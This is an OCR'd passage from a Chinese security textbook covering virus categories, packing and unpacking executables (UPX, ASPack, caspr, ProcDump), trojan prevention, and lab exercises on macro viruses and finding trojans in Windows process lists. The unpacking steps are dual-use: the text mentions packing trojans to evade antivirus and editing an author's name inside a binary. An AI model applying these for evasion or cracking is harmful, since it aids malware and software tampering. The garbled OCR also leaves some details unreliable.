给 用 户 计 算 机 带 来 安全 隐患 。 如 很 多 朋友 遇 到 过 的 人 RC 后 门 Backdoor.IRCBot。 


7. 病毒 种 植 程序 病毒 


病毒 种 植 程 序 病 毒 的 前 级 是 Dropper。 这 类 病毒 的 共有 特性 是 运行 时 会 从 体内 释放 出 一 
个 或 几 个 新 的 病毒 到 系统 目录 下 ， 由 释放 出 来 的 新 病毒 产生 破坏 。 如 : “冰河 播种 者 ” 
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(Dropper.BingHe2.2C)、“MSN 射手 ”(Dropper.Worm.Smibag) 等 。 
8. 破坏 性 程序 病毒 


破坏 性 程序 病毒 的 前 级 是 Harm。 这 类 病毒 的 共有 特性 是 本 身 具 有 好 看 的 图 标 来 诱惑 用 
户 点 击 ， 当 用 户 点 击 这 类 病毒 时 ， 病 毒 便 会 直接 对 用 户 计算 机 产生 破坏 。 如 : “格式 化 C 
盘 ”(Harm formatC. 人、“ 杀 手 命令 ”(Harm.Comnmand .Killen 等 。 


9. 玩笑 病毒 


玩笑 病毒 的 前 级 是 Joke， 该 病毒 也 称 恶 作 剧 病毒 。 这 类 病毒 的 共有 特性 是 本 身 具 有 好 
看 的 图 标 来 诱惑 用 户 点 击 ， 当 用 户 点 击 这 类 病毒 时 ， 病 毒 会 做 出 各 种 破坏 操作 来 吓 距 用 户 ， 
其 实 病毒 并 没有 对 用 户 计算 机 进行 任何 破坏 。 如 : “ 女 鬼 ”(Joke.Girlghost) 病 毒 。 

10. 捆绑 机 病毒 


捆绑 机 病毒 的 前 级 是 Binder。 这 类 病毒 的 共有 特性 是 病毒 作者 会 使 用 特定 的 捆绑 程序 
将 病毒 与 一 些 应 用 程序 如 QQ、IE 捆绑 起 来 ， 表 面 上 看 是 一 个 正常 的 文件 ， 当 用 户 运行 这 
些 捆绑 病毒 时 ， 会 表面 上 运行 这 些 应 用 程序 ， 然 后 隐藏 运行 捆绑 在 一 起 的 病毒 ， 从 而 给 用 
户 造成 危害 。 如 : “捆绑 QQ”(Binder.QQPass.QQBin)、“ 系统 杀手 ”(Binder.killsys) 等 。 


4.5.2 ”木马 的 加 壳 与 脱 壳 


1. 什么 是 加 过 

加 壳 一 般 是 指 保护 程序 资源 的 方法 。 软 件 加 壳 是 作者 写 完 软件 后 ， 为 了 保护 自己 的 代 
码 或 维护 软件 产权 等 利益 所 常用 到 的 手段 。 作 者 编 好 软件 后 ， 编 译 成 exe 可 执行 文件 。 

例如 : 

(1) 有 一 些 版 权 信 息 需要 保护 起 来 ， 不 想 让 别人 随便 改动 ， 如 作者 的 姓名 ， 即 为 了 保 
护 软件 不 被 破解 ， 通 常 都 是 采用 加 壳 来 进行 保护 。 

(2) 需要 把 程序 弄 得 小 一 点 ， 从 而 方便 使 用 。 于 是 ,需要 用 到 一 些 软 件 ， 它 们 能 将 exe 
可 执行 文件 压缩 。 

(3) 在 黑客 界 给 木马 等 软件 加 壳 脱 壳 以 躲避 杀毒 软件 。 

2. 加 壳 软件 


(1) 最 常见 的 加 壳 软 件 有 ASPACK、UPX、Pecompact。 

(2) 侦 测 壳 的 软件 fileinfo.exe 简称 fiexe( 侦 测 壳 的 能 力 极 强 )。 

(3) 侦 测 壳 和 软件 所 用 编写 语言 的 软件 language.exe， 推 荐 language2000 中 文 版 (专门 
检测 加 壳 类 型 )。 

(4) 软件 常用 编写 语言 Delphi，Visual Basic(VB)，VisualC(VC)。 

3. 脱 壳 


脱 过 一 般 是 指 除 掉 程序 的 保护 ， 用 来 修改 程序 资源 。 目 前 有 很 多 加 壳 工具 ， 当 然 有 盾 ， 
自然 就 有 矛 ， 只 要 我 们 收集 全 常用 脱 壳 工 具 ， 那 就 不 怕 他 加 壳 了 。 

现在 脱 过 一 般 分 手动 脱 过 和 自动 脱 壳 两 种 , 手动 脱 过 就 是 用 TRW2000、TR、SOFTICE 
等 调试 工具 对 付 ， 对 脱 壳 者 有 一 定 的 水 平 要 求 ,涉及 很 多 汇编 语言 和 软件 调试 方面 的 知识 。 
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而 自动 脱 壳 就 是 用 专门 的 脱 壳 工 具 来 脱 ， 最 常用 的 压缩 软件 都 有 他 人 写 的 反 压 缩 工 具 对 应 : 有 
些 压 缩 工 具 自身 能 解压 ， 如 UPX; 有 些 不 提供 这 项 功能 ， 如 ASPACK， 就 需要 UNASPACK 
对 付 ， 好 处 是 简单 ， 缺 点 是 版 本 更 新 了 就 没 用 了 。 最 流行 的 脱 壳 工具 是 PROCDUMP， 可 
对 付 目 前 各 种 压缩 软件 的 压缩 档 。 在 这 里 介绍 的 是 一 些 通用 的 方法 和 工具 ， 希 望 对 大 家 有 
帮助 。 我 们 知道 文件 的 加 密 方 式 ， 就 可 以 使 用 不 同 的 工具 和 方法 进行 脱 壳 。 

下 面 是 我 们 常常 会 碰 到 的 加 壳 方 式 及 简单 的 脱 壳 措 施 ， 供 大 家 参考 ; 脱 壳 的 基本 原则 
就 是 单 步 跟踪 ， 只 能 往 前 , 不 能 往 后。 脱 壳 的 一 般 流程 是 : 查 壳 一 寻找 OEP 一 Dump 一 修复 。 
找 OEP 的 一 般 思路 如 下 : 先 看 壳 是 加 密 壳 还 是 压缩 过 ， 压 缩 过 相对 来 说 容易 些 ， 一 般 是 没 
有 异常 ， 找 到 对 应 的 popad 后 就 能 找到 入 口 。 我 们 知道 文件 被 一 些 压缩 加 壳 软件 加 密 ， 下 
一 步 我 们 就 要 分 析 加 密 软件 的 名 称 、 版 本 。 因 为 不 同 软件 甚至 不 同 版 本 加 的 壳 ， 脱 壳 处 理 
的 方法 都 不 相同 。 

常用 脱 壳 工具 如 下 。 

(1) 文件 分 析 工 具 ( 侦 测 壳 的 类 型 ): Fi、GetTyp、peid、pe-scan。 

(2) OEP 入 口 查找 工具 : SofICE、TRW、ollydbg、loader、peid。 

(3) dump 工具 : IceDump、TRW、PEditor、ProcDump32、LordPE 。 

(4) PE 文件 编辑 工具 : PEditor、ProcDump32、LordPE。 

(5) 重建 Import Table 工具 : ImportREC、ReVirgin。 

(6) ASProtect 脱 壳 专用 工具 : Caspr( 只 对 ASPr V1.1-V1.2 有 效 )、Rad( 只 对 ASPr V1.1 
有 效 )、loader、peid。 

常用 加 壳 对 应 的 脱 壳 工具 如 下 。 

(1) Aspack: 用 的 最 多 ， 但 只 要 用 UNASPACK 或 PEDUMP32 脱 壳 就 行 了 。 

(2) ASProtecttaspack : 次 之 ， 国 外 的 软件 多 用 它 加 壳 ， 脱 壳 时 需要 用 到 
SOFTICE+ICEDUMP， 需 要 一 定 的 专业 知识 ， 但 最 新 版 现在 暂时 没有 办 法 。 

(3) Upx: 可 以 用 UPX 本 身 来 脱 壳 ， 但 要 注意 版 本 是 否 一 致 ， 用 -D 参数 。 

(4) Armadill: 可 以 用 SOFTICE+ICEDUMP 脱 壳 。 

(5) Dbpe: 国内 比较 好 的 加 密 软件 ， 新 版 本 暂时 不 能 脱 ， 但 可 以 破解 。 

(6) NeoLite: 可 以 用 自己 来 脱 壳 。 

(7) Pcguard: 可 以 用 SOFTICE+ICEDUMP+FROGICE 来 脱 壳 。 

(8) Pecompat: 用 SOFTICE 配合 PEDUMP32 来 脱 过 ， 但 不 要 专业 知识 。 

(9) Petite: 有 一 部 分 的 老 版 本 可 以 用 PEDUMP32 直接 脱 壳 ， 新 版 本 脱 过 时 需要 用 到 
SOFTICE+ICEDUMP， 和 需要 一 定 的 专业 知识 。 

(10) WWpack32: 和 PECOMPACT 一 样 其 实 有 一 部 分 的 老 版 本 可 以 用 PEDUMP32 直 
接 脱 壳 ， 不 过 有 时 候 资源 无 法 修改 ， 也 就 无 法 汉化 ， 所 以 最 好 还 是 用 SOFTICE 配合 
PEDUMP32 脱 壳 。 

我 们 通常 都 会 使 用 Procdump32 这 个 通用 脱 壳 软件 , 它 是 一 个 强大 的 脱 壳 软 件 , 它 可 以 
解 开 绝 大 部 分 的 加 密 外 壳 ， 还 有 脚本 功能 可 以 使 用 脚本 轻松 解 开 特定 外 壳 的 加 密 文件 。 另 
外 很 多 时 候 我 们 要 用 到 exe 可 执行 文件 编辑 软件 ultraedit。 也 可 以 下 载 它 的 汉化 注册 版 本 ， 
它 的 注册 机 可 从 网 上 搜 到 。ultraedit 打开 一 个 中 文 软件 ， 若 加 壳 ， 许 多 汉字 不 能 被 认 出 。 
ultraedit 打开 一 个 中 文 软件 ， 若 未 加 壳 或 已 经 脱 壳 ， 许 多 汉字 能 被 认 出 。ultraedit 可 用 来 检 
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验 壳 是 否 脱 掉 。 例 如 ， 可 用 它 的 替换 功能 把 作者 的 姓名 蔡 换 为 你 的 姓名 ， 注 意 字 节 必须 相 
等 ， 两 个 汉字 替 两 个 、 三 个 汉字 蔡 三 个 ， 不 足 处 在 ultraedit 编辑 器 左边 用 00 补 。 
常见 的 脱 壳 法 如 下 。 

(1) aspack 壳 ， 脱 壳 可 用 unaspack 或 caspr。 

QW unaspack. 

使 用 方法 类 似 lanuage, 傻瓜 式 软 件 ,运行 后 选取 待 脱 壳 的 软件 即 可 .缺点 : 只 能 脱 aspack 
早 些 时 候 版 本 的 壳 ， 不 能 脱 高 版 本 的 壳 。 

@@ caspr。 

第 一 种 : 待 脱 壳 的 软件 (如 aa.exe) 和 caspr.exe 位 于 同一 目录 下 ， 执 行 Windows 起 始 菜 
单 的 运行 ， 输 入 caspr aa.exe 脱 壳 后 的 文件 为 aa.ex_， 删 掉 原来 的 aa.exe， 将 aa.ex 改名 为 
aa.exe 即 可 。 优 点 : 可 以 脱 aspack 任何 版 本 的 壳 ， 脱 壳 能 力 极 强 。 缺 点 : DOS 界面 。 

第 二 种 :将 aa.exe 的 图 标 拖 到 caspr.exe 的 图 标 上 。 若 已 侦 测 出 是 aspack 壳 , 用 unaspack 
脱 壳 出 错 ， 说 明 是 aspack 高 版 本 的 壳 ， 用 caspr 脱 即 可 。 

(2) upx 壳 ， 脱 壳 可 用 upx。 

待 脱 壳 的 软件 (如 aa.exe) 和 upx.exe 位 于 同一 目录 下 ， 执 行 Windows 起 始 菜单 的 运行 ， 
输入 upx -d aa.exe。 

(3) PEcompact 壳 ， 脱 壳 用 unpecompact。 

使 用 方法 类 似 lanuage 傻瓜 式 软件 ， 运 行 后 选取 待 脱 壳 的 软件 即 可 。 

(4) procdump 万 能 脱 壳 但 不 精 ， 一 般 不 要 用 。 

使 用 方法 : 运行 后 ， 先 指定 壳 的 名 称 ， 再 选 定 欲 脱 壳 软件 ， 确 定 即 可 脱 壳 后 的 文件 大 
于 原文 件 。 由 于 脱 壳 软 件 很 成 熟 ， 手 动 脱 壳 一 般 用 不 到 。 


4.5.3 ”木马 的 防范 


首先 必须 知道 木马 到 底 是 如 何 被 植 入 系统 的 ， 才 能 采取 相应 的 防范 措施 。 攻 击 者 要 利 
用 木马 攻击 系统 ， 一 般 的 步 又 就 是 要 把 木马 服务 器 端的 程序 植 入 到 目标 系统 。 其 方法 有 
三 种 。 

(1) 下 载 软件 ， 木 马 的 服务 器 端 程序 非常 小 ， 几 字 节 到 几 十 字 节 不 等 ， 把 木马 用 EXE 
捆绑 机 捆绑 起 来 可 谓 轻而易举 ， 而 且 不 易 引 起 怀疑 。 有 些 网 站 所 提供 的 软件 当中 就 有 可 能 
捆绑 木马 程序 。 当 用 户 下 载 并 且 执 行 了 该 文件 以 后 ， 木 马 程序 也 相应 地 被 激活 了 。 

(2) 交换 脚本 众所周知 ， 微 软 的 浏览 器 在 执行 Script 脚本 上 存在 一 些 漏洞 ， 攻 击 者 
可 以 利用 这 些 漏洞 传播 病毒 和 木马 ， 甚 至 可 以 直接 对 浏览 者 计算 机 进行 文件 操作 等 控制 。 
Script、ActiveX 及 ASP、JSP、CGI 等 都 有 可 能 是 木马 的 滋生 地 。 

(3) 系统 漏洞 : 木马 还 可 以 利用 操作 系统 的 一 些 漏洞 进行 植 入 ， 如 IIS 服务 器 溢出 漏 
洞 ， 通 过 ISHACK 攻击 程序 即 可 使 FS 服务 器 崩溃 ， 并 且 同 时 在 攻击 服务 器 中 执行 远程 森 
马 服务 器 端 程序 。 

以 上 是 实施 木马 攻击 最 常用 的 三 个 方法 。 对 此 ， 提 出 了 下 面 的 对 应 防范 措施 。 

(1) 慎 防 网 络 资源 。 现在 网 络 上 小 至 木马 程序 , 大 至 盗版 Windows 操作 系统 也 有 下 载 ， 
其 中 来 源 也 各 式 各 样 ， 有 http、ftp、BT 等 。 任 何 从 网 上 下 载 回来 的 资源 ， 第 一 步 必须 要 做 
的 便 是 进行 病毒 扫描 。 现 在 大 多 反 病 毒 软件 都 能 清除 木马 ， 只 要 及 时 更 新 病毒 库 ， 安 全 的 
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系数 就 可 大 大 提高 。 

(2) 禁用 ActiveX 脚本 。 

(3) 及 时 升级 。 操 作 系统 和 浏览 器 都 存在 不 同 程度 上 的 漏洞 ， 入 侵 者 正 是 利用 这 些 漏 
洞 植 入 木马 。 因 此 ， 及 时 更 新 系统 ， 及 时 打 好 补丁 ， 及 时 把 漏洞 补 上 ， 被 入 侵 的 机 会 就 会 
大 大 减少 。 

(4) 启动 网 络 防火 墙 . 防火 墙 的 作用 在 于 控制 网 络 访问 。 用 户 可 以 设置 人 P 规则 和 安全 
级 别 来 防止 非法 连接 。 对 个 人 用 户 来 说 ， 比 较 常用 的 网 络 防火 墙 有 天 网 防火 墙 和 金山 网 镖 。 


4.5.4 安全 解决 方案 


(1) 目前 国内 有 多 款 优 秀 的 杀毒 软件 ， 如 金山 毒霸 、 瑞 星 、360 杀毒 软件 等 ， 它 们 功 
能 强大 ， 病 毒 库 更 新 快 ， 误 杀 率 低 。 

另外 要 记得 把 病毒 库 即时 升级 和 定时 查 杀 ， 如 设 定 某 一 个 时 间 杀 毒 后 ， 杀 毒 软件 将 在 
这 个 时 间 启 动 扫描 杀毒 引擎 ， 进 行 自动 查 杀 ， 如 果 设 定 自 动 查 杀 后 关机 ， 则 扫描 查 杀 完 成 
后 自动 关机 。 

(2) 下 载 软件 推荐 使 用 迅雷 。 因 为 迅雷 资源 丰富 ， 下 载 速度 快 ， 特 别 是 BT 下 载 。 另 
外 迅雷 和 卡巴 斯 基 联 合 推出 卡巴 斯 基 杀 毒 模块 ， 文 件 下 载 完毕 后 ， 迅 雷 自动 调用 卡巴 斯 基 
杀毒 模块 进行 检查 病毒 。 这 样 可 以 基本 确保 下 载 的 文件 无 病毒 之 虑 。 

G) 菜鸟 注意 一 般 不 要 安装 防火 墙 。 因 为 安装 后 ， 系 统 运行 每 个 程序 都 要 经 过 防火 墙 
的 认可 ,菜鸟 往往 不 知 所 以 ,认为 是 病毒 就 盲目 地 禁止 运行 ,造成 很 多 程序 不 能 正常 运行 ， 
高 手 就 不 包括 在 内 了 。 

(4) 多 下 载 一 些 病毒 专 杀 工具 , 以 备 不 时 之 需 。 同 时 注意 新 闻 和 网 络 上 公布 的 病毒 发 作 日 
和 新 病毒 的 信息 ， 并 及 时 升级 病毒 库 或 专 杀 工具 进行 查 杀 ， 没 有 把 握 就 不 要 进行 相关 操作 。 


小 ” 结 


本 章 主 要 介绍 了 计算 机 病毒 、 木 马 的 相关 知识 ， 通 过 本 章 学 习 ， 学 生 可 掌握 常见 病毒 、 
木马 的 种 类 、 防 范 方 法 等 知识 ， 了 解 病毒 、 木 马 的 攻击 原理 。 


本 章 实 训 
实 训 一 ” 宏 病毒 及 网 页 病毒 的 防范 


1. 实验 目的 

(1) 人 掌握 宏 病毒 的 判断 方法 。 

(2) 掌握 宏 病毒 的 防治 和 清除 。 
(3) 掌握 全 面 封 杀 网 页 病毒 的 方法 。 
2. 实验 内 容 


(1) 在 Office 文档 或 Office 系统 中 练习 宏 病 毒 的 判断 方法 。 
(2) 体验 宏 病 毒 的 防止 和 清除 。 
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G) 练习 全 面 封杀 网 页 病毒 的 方法 。 
3. 实验 步骤 


1)” 宏 病毒 的 判断 方法 

虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病 毒 ， 但 当 有 下 列 情况 之 一 时 ， 你 可 以 百 分 之 
百 地 断定 Office 文档 或 Office 系统 中 有 宏 病 毒 。 

(1) 在 打开 “ 宏 病毒 防护 功能 ”的 情况 下 ， 当 你 打开 一 个 你 自己 写 的 文档 时 ， 系 统 会 
弹出 相应 的 警告 框 。 而 你 清楚 你 并 没有 在 其 中 使 用 宏 或 并 不 知道 宏 到 底 怎 么 用 ， 那 么 你 可 
以 完全 肯定 你 的 文档 已 经 感染 了 宏 病 毒 。 

(2) 同样 是 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ， 你 的 Office 文档 中 一 系列 的 文件 都 
在 打开 时 给 出 宏 警 告 。 由 于 在 一 般 情况 下 我 们 很 少 使 用 到 宏 ， 所 以 当 你 看 到 成 串 的 文档 有 
宏 警 告 时 ， 可 以 肯定 这 些 文档 中 有 宏 病 毒 。 

(3) 如 果 软 件 中 关于 宏 病 毒 防护 选项 启用 后 , 不 能 在 下 次 开机 时 依然 保存 。Word 2013 
中 提供 了 对 宏 病 毒 的 防护 功能 ， 它 可 以 在 “工具 /选项 /常规 ”中 进行 设 定 。 但 有 些 宏 病 毒 为 
了 对 付 Office 2013 中 提供 的 宏 警 告 功能 , 它 在 感染 系统 (这 通常 只 有 在 你 关闭 了 宏 病 毒 防护 
选项 或 者 出 现 宏 警告 后 ， 你 不 留神 选取 了 “启用 宏 ” 才 有 可 能 ) 后 ， 会 在 每 次 退出 OFFICE 
时 自动 屏蔽 掉 宏 病毒 防护 选项 。 因 此 一 旦 发 现 机 器 中 设置 的 宏 病毒 防护 功能 选项 无 法 在 两 
次 启动 Word 之 间 保 持 有 效 ， 则 系统 一 定 已 经 感染 了 宏 病 毒 。 也 就 是 说 一 系列 Word 模板 、 
特别 是 normal.dot 已 经 被 感染 。 

2) ” 宏 病 毒 的 防治 和 清除 

(1) 首选 方法 : 用 最 新 版 的 反 病 毒 软件 清除 宏 病 毒 。 使 用 反 病 毒 软件 是 一 种 高 效 、 安 
全 和 方便 的 清除 方法 ， 也 是 一 般 计 算 机 用 户 的 首选 方法 。 对 付 宏 病 毒 应 该 和 对 付 其 他 种 类 
的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 查 杀 病毒 软件 。 无 论 使 用 的 是 何 种 反 病 毒 软件 ， 及 时 
升级 是 非常 重要 的 。 

(2) 应 急 处 理 方法 : 用 写字 板 或 Word 6.0 文档 作为 清除 宏 病毒 的 桥梁 。 如 果 你 的 Word 
系统 没有 感染 宏 病 毒 ， 但 需要 打开 某 个 外 来 的 、 己 查 出 感染 有 宏 病 毒 的 文档 ， 而 手头 现 有 
的 反 病毒 软件 又 无 法 查 杀 它们 ， 那 么 你 可 以 试验 用 下 面 的 方法 来 查 杀 文 档 中 的 宏 病 毒 ， 打 
开 这 个 包含 了 宏 病 毒 的 文档 (当然 是 启用 Word 中 的 “ 宏 病 毒 防护 ”功能 ， 并 在 宏 警 告 出 现 
时 选择 “取消 宏 ”)， 然 后 在 “文件 ”菜单 中 选择 “另存 为 ”命令 ,将 此 文档 改 存 成 写字 板 
(RTF) 格 式 或 Word 6.0 格式 。 

存盘 后 应 该 检查 一 下 文档 的 完整 性 ， 如 果 文 档 内 容 没 有 任何 丢失 ， 并 且 在 重新 打开 此 
文档 时 不 再 出 现 宏 警告 则 大 功 告 成 。 

在 所 有 的 病毒 传播 的 途径 中 ， 利 用 网 页 传播 病毒 的 危害 是 最 大 的 。 稍 不 留神 ， 就 可 能 
中 招 。 其 实 ， 我 们 完全 可 以 变 被 动 的 查 杀 为 主动 的 防范 ， 做 到 防 患 于 未 然 。 全 面 封杀 网 页 
病毒 的 方法 如 下 。 

(1) 屏蔽 指定 网 页 。 

对 于 一 些 包 含 恶意 代码 的 网 页 ， 在 知道 其 地 址 的 情况 下 ， 我 们 可 以 将 其 屏蔽 掉 。 启 动 
正 浏览 器 后 ， 打 开 “ 工 具 ” 菜 单 下 的 “Intemet 选项 ”命令 ， 将 打开 的 窗口 切换 到 “内 容 ” 
选项 卡 ， 在 “分 级 审查 ”中 单 击 “ 启 用 ”按钮 ， 将 打开 的 “内 容 审查 程序 ”窗口 切换 到 “ 许 
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可 站 点 ”选项 卡 ， 然 后 在 “人 允许 该 站 点 ”中 输入 其 地 址 并 单 击 “ 从 不 ”按钮 将 其 添加 到 拒 

绝 列表 中 即 可 。 

(2) 提高 安全 级 别 。 

由 于 网 页 病毒 很 多 都 是 通过 包含 恶意 脚本 来 实现 攻击 的 ， 因 此 我 们 首先 可 以 采取 提高 

正 安全 级 别 的 方法 来 防范 。 

将 前 面 打开 的 Internet 窗口 切换 到 “安全 ”选项 卡 ， 然 后 单 击 “ 自 定义 级 别 ” 按 钮 打开 
“安全 设置 ”窗口 ， 将 “ActiveX 控件 和 插件 ”、“ 脚 本 ”下 的 所 有 选项 ， 都 尽 可 能 地 设 为 
“禁用 ”， 同 时 将 “ 重 置 自 定义 设置 ” 设 为 “安全 级 -高 ” 即 可 。 

(3) 确保 WSH 安全 。 

很 多 网 页 会 利用 VBScript 编制 病毒 ,它们 利用 Windows 自 带 的 Windows Scripting Host 
激活 运行 。 对 此 ， 我 们 可 以 采取 卸载 系统 自 带 的 WSH 或 将 其 升级 来 防范 这 类 病毒 的 横行 。 
如 果 是 Windows 9X 系统 ， 那 么 只 要 打开 “添加 /删除 程序 ”项 ， 然 后 通过 修改 Windows 组 
件 ， 把 “附件 ”项 中 的 “Windows Scripting Host” 取 消 即 可 ; 如果 是 Windows 2000/XP 操 
作 更 加 简单 , 只 需要 打开 文件 夹 选 项 窗口 , 然后 在 “文件 类 型 ”选项 卡 , 找到 “VBS VBScript 
Script File” 选 项 并 将 其 删除 即 可 。 

另外 我 们 也 可 以 通过 到 微软 网 站 下 载 安 装 最 新 的 WSH, 这 样 也 可 以 在 一 定 程度 上 避免 
VBScript 病毒 的 运行 。 

(4) 禁止 远程 注册 表 服 务 。 

通常 情况 下 ， 我 们 是 不 需要 启动 远程 注册 表 服 务 的 ， 因 为 很 多 恶意 网 页 病毒 是 通过 修 
改 注 册 表 来 达到 自己 的 目的 ， 因 此 我 们 可 以 将 该 服务 关闭 。 进 入 控制 面板 ， 在 “管理 工具 ” 
文件 夹 中 打开 “服务 ”项 ， 然 后 双击 右 侧 的 “Remote Registry”， 将 其 启动 类 型 设 为 “已 
禁用 ”， 并 单 击 “ 停 用 ”按钮 即 可 。 

要 预防 网 页 病毒 对 自己 的 侵害 ， 除 了 做 好 上 面 的 保护 工作 之 外 ， 还 必须 养 成 良好 的 使 
用 习惯 ， 有 条 件 的 应 当 安装 防火 墙 和 杀毒 软件 ， 这 样 也 可 以 在 一 定 程度 上 阻拦 网 页 脚本 程 
序 的 运行 。 


实 训 二 ”第 四 代 木 马 的 防范 


1. 实验 目的 

针对 第 四 代 木 马 无 法 掩藏 进程 的 缺陷 ， 通 过 查看 进程 的 方法 找 出 木马 。 
2. 实验 内 容 

通过 查看 进程 找 出 木马 病毒 。 

3. 实验 步骤 


要 想 通 过 查看 进程 列表 来 发 现 木 马 ， 首 先 必须 知道 哪些 是 系统 进程 ， 然 后 才能 发 现 可 
疑 进 程 。 如 果 那 台 计 算 机 是 一 台 个 人 使 用 的 计算 机 ， 只 要 保证 每 次 启动 后 在 任务 管理 器 进 
程 列 表 ( 按 Ctrl+Shift+Esc 组 合 键 ) 中 的 进程 为 “最 基本 的 系统 进程 ”+ 安装 的 自 启动 软件 的 
进程 (如 杀毒 软件 ， 防 火 墙 等 )。 
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一 般 个 人 使 用 的 计算 机 有 这 些 进程 就 够 了 ， 如 果 发 现 有 多 余 的 进程 ， 你 可 以 通过 服务 
管理 器 找到 相应 的 服务 并 停止 它 来 结束 进程 。 如 果 发 现 多 余 的 进程 并 不 是 系统 服务 ， 那 么 
这 个 进程 很 可 能 就 是 一 个 木马 。 你 可 以 把 这 个 进程 名 记 下 来 ， 这 个 进程 名 在 下 面 的 内 容 中 
要 用 来 进一步 确定 是 否 是 木马 。 

如 果 那 台 计 算 机 是 一 台 服 务 器 ， 每 次 启动 后 在 任务 管理 器 进程 列表 ( 按 Ctrlt+Shift+Esc 
组 合 键 ) 中 的 进程 为 “最 基本 的 系统 进程 ”+ 安装 的 自 启动 软件 的 进程 (如 杀毒 软件 ， 防 火 墙 
等 )+ 所 需 的 服务 。 这 就 要 根据 需求 自己 配置 ， 第 一 次 配置 完 后 记 下 进程 列表 ， 以 后 要 经 常 
查看 进程 列表 , 发 现 多 余 的 进程 就 把 它 记 下 来 , 再 根据 下 面 内 容 来 进一步 确定 是 否 是 木马 。 

下 面 是 系统 的 进程 列表 进程 名 ID 描述 最 基本 的 系统 进程 (也 就 是 说 ， 这 些 进程 是 系统 
运行 的 基本 条 件 ， 有 了 这 些 进程 ， 系 统 就 能 正常 运行 )。 

System Idle Process 0 

System 8 

smss.exe Session Manager 

csrss.exe “ 子 系 统 服务 器 进程 

winlogon.exe ”管理 用 户 登 录 

services.exe ”包含 很 多 系统 服务 

lsass.exe 管理 IP 安全 策略 以 及 启动 ISAKMP/Oakley (IKE) 和 IP 安全 驱动 程序 。 
(系统 服务 ) 

产生 会 话 密 钥 以 及 授予 用 于 交互 式 客户 /服务 器 验证 的 服务 凭据 (ticket)。( 系 统 服务 ) 

svchost.exe ”包含 很 多 系统 服务 

spoolsv.EXE ”将 文件 加 载 到 内 存 中 以 便 迟 后 打印 。( 系 统 服务 ) 

explorer.exe ”资源 管理 器 

internat.exe ”托盘 区 的 拼音 图 标 

附加 的 系统 进程 (这 些 进程 不 是 必要 的 ， 可 以 根据 需要 通过 服务 管理 器 来 增加 或 减少 ) 

mstask.exe ”允许 程序 在 指定 时 间 运 行 。( 系 统 服务 ) 

regsvc.exe ”人 允许 远程 注册 表 操 作 。( 系 统 服务 ) 

winmgmt.exe ”提供 系统 管理 信息 (系统 服务 ) 

inetinfo.exe 通过 Intemet 信息 服务 的 管理 单元 提供 FTP 连接 和 管理 。( 系 统 服务 ) 

tlntsvr.exe ”允许 远程 用 户 登录 到 系统 并 且 使 用 命令 行 运行 控制 台 程 序 。( 系 统 服务 ) 

允许 通过 Intemet 信息 服务 的 管理 单元 管理 Web 和 FTP 服务 。( 系 统 服务 ) 

tftpd.exe ”实现 TFTP Intemet 标准 。 该 标准 不 要 求 用 户 名 和 密码 。 远 程 安装 服务 的 一 
部 分 。( 系 统 服务 ) 

termsrv.exe ”提供 多 会 话 环 境 允 许 客户 端 设 备 访问 虚拟 的 Windows 2000 Professional 
桌面 会 话 以 及 运行 在 服务 器 上 的 基于 Windows 的 程序 。( 系 统 服务 ) 

dns.exe ”应 答对 域名 系统 (DNS) 名 称 的 查询 和 更 新 请 求 。( 系 统 服务 ) 

以 下 服务 很 少 会 用 到 , 上 面 的 服务 都 对 安全 有 害 , 如 果 不 是 必要 的 应 该 关 掉 tcpsvcs.exe 
提供 在 PXE 可 远程 启动 客户 计算 机 上 远程 安装 Windows 2000 Professional 的 能 力 。 (系统 
服务 ) 


由 7 


支持 以 下 TCP/IP 服务 : Character Generator，Daytime， Discard， Echo， 以 及 Quote of 
the Day。( 系 统 服务 ) 

ismserv.exe ”人 允许 在 Windows Advanced Server 站 点 间 发 送 和 接收 消息 。( 系 统 服务 ) 

ups.exe ”管理 连接 到 计算 机 的 不 间断 电源 (UPS)。( 系 统 服 务 ) 

wins.exe ”为 注册 和 解析 NetBIOS 型 名 称 的 TCP/IP 客户 提供 NetBIOS 名 称 服务 。( 系 
统 服务 ) 

llssrv.exe ”License Logging Service( 系 统 服务 ) 

ntfrs.exe 在 多 个 服务 器 间 维 护 文件 目录 内 容 的 文件 同步 。( 系 统 服务 ) 

RsSub.exe ”控制 用 来 远程 储存 数据 的 媒体 。( 系 统 服务 ) 

locator.exe 管理 RPC 名 称 服务 数据 库 。( 系 统 服 务 ) 

lserver.exe ”安装 许可 证 服务 器 并 且 在 连接 到 一 台 终 端 服务 器 时 提供 注册 客户 端 许 可 
证 。( 系 统 服务 ) 

dfssvc.exe ”管理 分 布 于 局 域 网 或 广域网 的 逻辑 卷 。( 系 统 服 务 ) 

clipsrv.exe ”支持 “剪贴 簿 查看 器 ”， 以 便 可 以 从 远程 剪贴 簿 查阅 剪贴 页 面 。( 系 统 服 务 ) 

msdtc.exe ”并 列 事务 ， 是 分 布 于 两 个 以 上 的 数据 库 ， 消 息 队 列 、 文 件 系统 ， 或 其 他 事 
务 保护 资源 管理 器 。( 系 统 服务 ) 

faxsvc.exe ”帮助 发 送 和 接收 传真 。( 系 统 服务 ) 

cisvc.exe ”Indexing Service( 系 统 服务 ) 

dmadmin.exe ”磁盘 管理 请 求 的 系统 管理 服务 。( 系 统 服务 ) 

mnmsrvc.exe ”人 允许 有 权限 的 用 户 使 用 NetMeeting 远程 访问 Windows 桌面 .( 系 统 服务 ) 

netdde.exe ”提供 动态 数据 交换 (DDE) 的 网 络 传输 和 安全 特性 。( 系 统 服务 ) 

smlogsvc.exe ”配置 性 能 日 志和 警报 。( 系 统 服 务 ) 

rsvp.exe ”为 依赖 质量 服务 (QoS) 的 程序 和 控制 应 用 程序 提供 网 络 信 号 和 本 地 通信 控制 
安装 功能 。( 系 统 服务 ) 

RsEng.exe 协调 用 来 储存 不 常用 数据 的 服务 和 管理 工具 。( 系 统 服务 ) 

RsFsa.exe 管理 远程 储存 的 文件 的 操作 。( 系 统 服 务 ) 

grovel.exe ”扫描 零 备份 存储 (SIS) 卷 上 的 重复 文件 ， 并且 将 重复 文件 指向 一 个 数据 存储 
点 ， 以 节省 磁盘 空间 。( 系 统 服 务 ) 

SCardSvr.exe ”对 插入 在 计算 机 智能 卡 阅 读 器 中 的 智能 卡 进行 管理 和 访问 控制 。 (系统 服务 ) 

snmp.exe ”包含 代理 程序 可 以 监视 网 络 设备 的 活动 并 且 向 网 络 控制 台 工作 站 汇报 。( 系 
统 服 务 ) 

